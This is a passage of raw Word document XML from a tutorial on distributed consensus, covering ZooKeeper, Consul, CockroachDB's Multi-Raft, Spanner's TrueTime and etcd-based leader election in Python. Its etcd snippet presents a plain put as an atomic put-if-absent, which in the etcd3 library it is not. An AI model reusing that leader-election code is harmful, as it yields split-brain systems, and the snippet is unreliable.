    </w:p>
    <w:p w14:paraId="6F27234D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Uses TCP ordering guarantees (messages from leader arrive in order)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82278D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Supports "ephemeral nodes" (auto-deleted when client session ends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B341953" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Sequential nodes (auto-incrementing names)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC5B77" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0DEE05" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Used by: Kafka (pre-KRaft), HBase, Hadoop, Solr, many Java ecosystem tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A713784" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="746BACF9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Primitives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D7CD7B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Znodes (hierarchical key-value like a filesystem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2DFCC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Watches (notification on change)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36804F1B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Ephemeral nodes (session-bound — for leader election, service discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736788E9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Sequential nodes (for distributed queues, barriers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC4522" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Consul (Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F5182C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAD1C42" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Consul: Service mesh + service discovery + KV store, all using Raft.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E220CBC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4B4F4C55" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Uses consensus for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C303005" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Consistent service registry (which services are healthy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF132C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - KV store for configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7F5348" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Leader election service (applications can elect leaders via Consul)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AAB1E5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Intentions (service-to-service authorization rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7775A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 CockroachDB (Multi-Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8A0B7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606A76A7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>CockroachDB: Distributed SQL database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56CD57" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="7010794A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Innovation: Runs THOUSANDS of Raft groups simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A014C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Data split into ~64 MB "ranges"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E08C5C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Each range is an independent Raft group (3 or 5 replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7597C3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Different ranges can have leaders on different nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BF4E0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDF178" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Result: Write throughput scales with nodes (different ranges write to different leaders).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452555FF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4460E377" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node 1: Leader for Range A, Follower for Range B, Follower for Range C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54031F2D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node 2: Follower for Range A, Leader for Range B, Follower for Range C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFDE1D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Node 3: Follower for Range A, Follower for Range B, Leader for Range C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88AD11" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964374B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Writes to Range A → Node 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA3B73" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Writes to Range B → Node 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B76059" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Writes to Range C → Node 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F831AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16961FDA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Total write throughput = sum of all range leaders (distributed across all nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850A08D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.5 Google Spanner (Paxos + TrueTime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BF718" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B3448F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Spanner: Globally distributed, strongly consistent database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A10EA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="3347E1A9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8E596" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Data split into "splits" (ranges)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557C997C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Each split replicated via Paxos (typically 5 replicas across regions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28191CC4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - TrueTime: GPS + atomic clocks provide bounded clock uncertainty (&lt;7ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66714233" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220584CE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>How reads work (externally consistent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C4AA5A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Read at timestamp T.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC81E87" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Leader for the split guarantees: all writes committed before T are visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07480719" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - TrueTime ensures T is "real" (no clock skew issues).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71450CB1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0104CE80" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>How writes work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072C311" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Acquire locks on affected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2305B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Paxos consensus to replicate the write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F5D57B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Assign commit timestamp using TrueTime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BBDAE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Wait out uncertainty interval ("commit wait" ~7ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36788890" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Release locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BD9AC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A81C3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Cost: 7ms minimum write latency (commit wait) + Paxos round trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D0ED5C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Benefit: Globally consistent reads without ANY coordination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E9BE4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="1AB76468">
          <v:rect id="_x0000_i6245" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1F5FE2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8. Consensus for Leader Election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE23DD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 The Leader Election Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA2A90E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673C5AC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Multiple nodes must agree on ONE leader:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11732BDC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Exactly one leader at a time (safety)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6646CE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - A new leader is elected if the current one fails (liveness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B702F0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - All nodes agree on who the leader is (consensus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F86A35" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="700F55DB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Without consensus: split-brain (two nodes both think they're leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175DB443" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  → Both accept writes → data diverges → catastrophe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D93201" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 How Raft-Based Leader Election Works (in etcd/Consul)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276004AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299FBF5C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t># Application uses etcd for leader election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CE3FB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>import etcd3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242F52F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="5DC4B19D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>client = etcd3.client()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDEADF3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="42C432EC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t># Create a lease (auto-expires if not renewed — heartbeat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE253EF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>lease = client.lease(ttl=10)  # 10-second lease</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BAED9D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="023A6832" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t># Try to become leader (atomic put-if-absent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBF692" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>success = client.put('/election/leader', 'node-42', lease=lease)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EEFF8D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t># Only succeeds if key doesn't exist (no current leader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEC41F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0C46DBCA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>if success:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156A980C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    # I am the leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3557B8A9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153FCFF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">        lease.refresh()  # Renew lease every few seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D6EB3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">        do_leader_work()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2C7504" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691CAF8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    # Watch for leader key deletion (leader died / lease expired)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12246A3F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    events, cancel = client.watch('/election/leader')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C9C1A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    for event in events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD412C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">        if isinstance(event, etcd3.events.DeleteEvent):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4A29E0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">            # Leader gone — try to become leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713537A3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">            try_become_leader()</w:t>
      </w:r>
